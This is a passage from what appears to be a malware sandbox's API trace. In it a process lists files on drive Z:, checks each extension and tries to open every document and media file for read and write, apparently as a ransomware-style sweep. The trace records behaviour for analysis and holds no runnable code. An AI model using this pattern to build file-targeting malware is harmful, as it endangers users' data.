Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.955] PathFindExtensionW (pszPath="Z:\\2E6UGCq.doc") returned=".doc" [0175.959] CreateFileW (lpFileName="Z:\\2E6UGCq.doc" (normalized: "z:\\2e6ugcq.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.961] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13179, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nCFz76aqfOi4GGvs9d9.m4a", cAlternateFileName="")) returned 1 [0175.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.961] PathFindExtensionW (pszPath="Z:\\nCFz76aqfOi4GGvs9d9.m4a") returned=".m4a" [0175.966] CreateFileW (lpFileName="Z:\\nCFz76aqfOi4GGvs9d9.m4a" (normalized: "z:\\ncfz76aqfoi4ggvs9d9.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0175.968] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5140, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C9OE6MiLKOuTz5.avi", cAlternateFileName="")) returned 1 [0175.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.968] PathFindExtensionW (pszPath="Z:\\C9OE6MiLKOuTz5.avi") returned=".avi" [0175.973] CreateFileW (lpFileName="Z:\\C9OE6MiLKOuTz5.avi" (normalized: "z:\\c9oe6milkoutz5.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0175.974] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xaf7f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b13UpS9k3v.swf", cAlternateFileName="")) returned 1 [0175.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.974] PathFindExtensionW (pszPath="Z:\\b13UpS9k3v.swf") returned=".swf" [0175.979] CreateFileW (lpFileName="Z:\\b13UpS9k3v.swf" (normalized: "z:\\b13ups9k3v.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0175.981] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26594678, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x577b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM3Rngzs9r6yCyV.csv", cAlternateFileName="")) returned 1 [0175.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.981] PathFindExtensionW (pszPath="Z:\\MM3Rngzs9r6yCyV.csv") returned=".csv" [0175.986] CreateFileW (lpFileName="Z:\\MM3Rngzs9r6yCyV.csv" (normalized: "z:\\mm3rngzs9r6ycyv.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0175.987] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15886, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mcLK0zRep8.ots", cAlternateFileName="")) returned 1 [0175.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.987] PathFindExtensionW (pszPath="Z:\\mcLK0zRep8.ots") returned=".ots" [0175.992] CreateFileW (lpFileName="Z:\\mcLK0zRep8.ots" (normalized: "z:\\mclk0zrep8.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0175.994] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xab34, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p7Ha2r1u6wluhJ.pptx", cAlternateFileName="")) returned 1 [0175.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.994] PathFindExtensionW (pszPath="Z:\\p7Ha2r1u6wluhJ.pptx") returned=".pptx" [0175.999] CreateFileW (lpFileName="Z:\\p7Ha2r1u6wluhJ.pptx" (normalized: "z:\\p7ha2r1u6wluhj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.000] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8b6e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iJonu6wFMMd.bmp", cAlternateFileName="")) returned 1 [0176.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.001] PathFindExtensionW (pszPath="Z:\\iJonu6wFMMd.bmp") returned=".bmp" [0176.005] CreateFileW (lpFileName="Z:\\iJonu6wFMMd.bmp" (normalized: "z:\\ijonu6wfmmd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.007] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbd6e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KeH2iEJnN7k1r.odt", cAlternateFileName="")) returned 1 [0176.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.007] PathFindExtensionW (pszPath="Z:\\KeH2iEJnN7k1r.odt") returned=".odt" [0176.012] CreateFileW (lpFileName="Z:\\KeH2iEJnN7k1r.odt" (normalized: "z:\\keh2iejnn7k1r.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.013] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x140ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9lpH4LUvBOFfSshu6h.csv", cAlternateFileName="")) returned 1 [0176.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.013] PathFindExtensionW (pszPath="Z:\\9lpH4LUvBOFfSshu6h.csv") returned=".csv" [0176.018] CreateFileW (lpFileName="Z:\\9lpH4LUvBOFfSshu6h.csv" (normalized: "z:\\9lph4luvboffsshu6h.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.019] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13a59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2XXFjQNQ26X8Wc.swf", cAlternateFileName="")) returned 1 [0176.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.019] PathFindExtensionW (pszPath="Z:\\2XXFjQNQ26X8Wc.swf") returned=".swf" [0176.024] CreateFileW (lpFileName="Z:\\2XXFjQNQ26X8Wc.swf" (normalized: "z:\\2xxfjqnq26x8wc.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.026] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd32d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KLswtt0JPiPQkCC6R3Lm.m4a", cAlternateFileName="")) returned 1 [0176.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.026] PathFindExtensionW (pszPath="Z:\\KLswtt0JPiPQkCC6R3Lm.m4a") returned=".m4a" [0176.030] CreateFileW (lpFileName="Z:\\KLswtt0JPiPQkCC6R3Lm.m4a" (normalized: "z:\\klswtt0jpipqkcc6r3lm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.032] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9304, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bVYQpQ1.mp4", cAlternateFileName="")) returned 1 [0176.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.032] PathFindExtensionW (pszPath="Z:\\bVYQpQ1.mp4") returned=".mp4" [0176.037] CreateFileW (lpFileName="Z:\\bVYQpQ1.mp4" (normalized: "z:\\bvyqpq1.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.039] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd722, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pQaKrG.pptx", cAlternateFileName="")) returned 1 [0176.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.039] PathFindExtensionW (pszPath="Z:\\pQaKrG.pptx") returned=".pptx" [0176.044] CreateFileW (lpFileName="Z:\\pQaKrG.pptx" (normalized: "z:\\pqakrg.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.045] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf4a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AzVWpbVP.doc", cAlternateFileName="")) returned 1 [0176.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.045] PathFindExtensionW (pszPath="Z:\\AzVWpbVP.doc") returned=".doc" [0176.050] CreateFileW (lpFileName="Z:\\AzVWpbVP.doc" (normalized: "z:\\azvwpbvp.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.052] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11b85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EmJj9nJ.pptx", cAlternateFileName="")) returned 1 [0176.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.052] PathFindExtensionW (pszPath="Z:\\EmJj9nJ.pptx") returned=".pptx" [0176.057] CreateFileW (lpFileName="Z:\\EmJj9nJ.pptx" (normalized: "z:\\emjj9nj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.058] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xadfb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fUgAWuSkZ3EbpCZ5Rvs.gif", cAlternateFileName="")) returned 1 [0176.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.058] PathFindExtensionW (pszPath="Z:\\fUgAWuSkZ3EbpCZ5Rvs.gif") returned=".gif" [0176.063] CreateFileW (lpFileName="Z:\\fUgAWuSkZ3EbpCZ5Rvs.gif" (normalized: "z:\\fugawuskz3ebpcz5rvs.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.065] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6fbf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MwAvirxPiQV.swf", cAlternateFileName="")) returned 1 [0176.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.065] PathFindExtensionW (pszPath="Z:\\MwAvirxPiQV.swf") returned=".swf" [0176.069] CreateFileW (lpFileName="Z:\\MwAvirxPiQV.swf" (normalized: "z:\\mwavirxpiqv.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.070] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1339b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vfiyj.gif", cAlternateFileName="")) returned 1 [0176.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.070] PathFindExtensionW (pszPath="Z:\\vfiyj.gif") returned=".gif" [0176.075] CreateFileW (lpFileName="Z:\\vfiyj.gif" (normalized: "z:\\vfiyj.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.078] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1526f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USKBVwnLaYIUmcn.mp4", cAlternateFileName="")) returned 1 [0176.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.078] PathFindExtensionW (pszPath="Z:\\USKBVwnLaYIUmcn.mp4") returned=".mp4" [0176.083] CreateFileW (lpFileName="Z:\\USKBVwnLaYIUmcn.mp4" (normalized: "z:\\uskbvwnlayiumcn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.085] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x86dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s6JQB.pptx", cAlternateFileName="")) returned 1 [0176.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.085] PathFindExtensionW (pszPath="Z:\\s6JQB.pptx") returned=".pptx" [0176.090] CreateFileW (lpFileName="Z:\\s6JQB.pptx" (normalized: "z:\\s6jqb.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.091] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9f6f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sl70jWmP2ggACy.png", cAlternateFileName="")) returned 1 [0176.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.092] PathFindExtensionW (pszPath="Z:\\sl70jWmP2ggACy.png") returned=".png" [0176.097] CreateFileW (lpFileName="Z:\\sl70jWmP2ggACy.png" (normalized: "z:\\sl70jwmp2ggacy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.098] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xab59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NBAT3tYNBcHdC.ppt", cAlternateFileName="")) returned 1 [0176.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.098] PathFindExtensionW (pszPath="Z:\\NBAT3tYNBcHdC.ppt") returned=".ppt" [0176.103] CreateFileW (lpFileName="Z:\\NBAT3tYNBcHdC.ppt" (normalized: "z:\\nbat3tynbchdc.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 